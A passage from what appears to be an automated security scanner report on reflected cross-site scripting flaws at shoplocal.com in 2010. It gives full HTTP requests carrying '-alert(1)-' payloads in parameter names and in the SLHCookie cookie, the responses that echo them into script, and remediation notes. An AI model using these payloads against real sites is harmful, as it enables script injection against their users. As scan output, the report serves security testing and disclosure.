GET /topdealslanding.aspx?21558'-alert(1)-'410ca815546=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:45:24 GMT Connection: close Content-Length: 56309
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?21558'-alert(1)-'410ca815546=1&action=topdealslanding&viewmode=local&referrer=&random=1102767598&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.41. http://www.shoplocal.com/toppings.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/toppings.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcc50'-alert(1)-'cc015268db7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /toppings.fp?bcc50'-alert(1)-'cc015268db7=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:09 GMT Connection: close Content-Length: 78580
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=135322&bcc50'-alert(1)-'cc015268db7=1&action=browselocall2&viewmode=local&referrer=&random=320127196&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.42. http://www.shoplocal.com/water.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/water.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb8b6'-alert(1)-'3474c96ea12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /water.fp?fb8b6'-alert(1)-'3474c96ea12=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:57:17 GMT Connection: close Content-Length: 161879
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=135307&fb8b6'-alert(1)-'3474c96ea12=1&action=browselocall2&viewmode=local&referrer=&random=1644786261&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.43. http://www.shoplocal.com/wine-spirits.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/wine-spirits.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fef81'-alert(1)-'72072aac25c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wine-spirits.fp?fef81'-alert(1)-'72072aac25c=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:54:52 GMT Connection: close Content-Length: 168152
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=134867&fef81'-alert(1)-'72072aac25c=1&action=browselocall2&viewmode=local&referrer=&random=1780714587&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f29ab'-alert(1)-'194af86a491 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0f29ab'-alert(1)-'194af86a491; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:42:19 GMT Connection: close Content-Length: 60005
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61bf5'-alert(1)-'28a08f1fa8b was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /BrowseLocalL2.aspx?n=14391278 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=061bf5'-alert(1)-'28a08f1fa8b; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:56:11 GMT Connection: close Content-Length: 168068
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7d33'-alert(1)-'954df6b37f6 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /BrowseLocalL2.aspx HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0b7d33'-alert(1)-'954df6b37f6; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:55:11 GMT Connection: close Content-Length: 32623
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79abe'-alert(1)-'f8ed4b5cd7d was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /air-fresheners.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=079abe'-alert(1)-'f8ed4b5cd7d; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:55:07 GMT Connection: close Content-Length: 175312
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d932d'-alert(1)-'49db9808541 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /baby-food.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0d932d'-alert(1)-'49db9808541; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:46:18 GMT Connection: close Content-Length: 160234
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c33b1'-alert(1)-'8b9724b0cda was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /baked-goods.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0c33b1'-alert(1)-'8b9724b0cda; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:49:09 GMT Connection: close Content-Length: 160907
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5ce9'-alert(1)-'15c98b3cb58 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /baking-oils-spices.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0a5ce9'-alert(1)-'15c98b3cb58; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:46:36 GMT Connection: close Content-Length: 177580
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27b9d'-alert(1)-'8fa24bc585d was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /beer-wine-tobacco.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=027b9d'-alert(1)-'8fa24bc585d; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:53:17 GMT Connection: close Content-Length: 171254
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd886'-alert(1)-'4e653f1488a was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /beer.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0cd886'-alert(1)-'4e653f1488a; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:23 GMT Connection: close Content-Length: 161089
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75d00'-alert(1)-'8cb5500b4b7 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /beverages.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=075d00'-alert(1)-'8cb5500b4b7; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:54:24 GMT Connection: close Content-Length: 175747
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6c67'-alert(1)-'6f346f9cea7 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /black-friday.aspx HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0e6c67'-alert(1)-'6f346f9cea7; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:45:09 GMT Connection: close Content-Length: 39780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6523'-alert(1)-'a589818176e was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bread.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0b6523'-alert(1)-'a589818176e; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:45:48 GMT Connection: close Content-Length: 123572
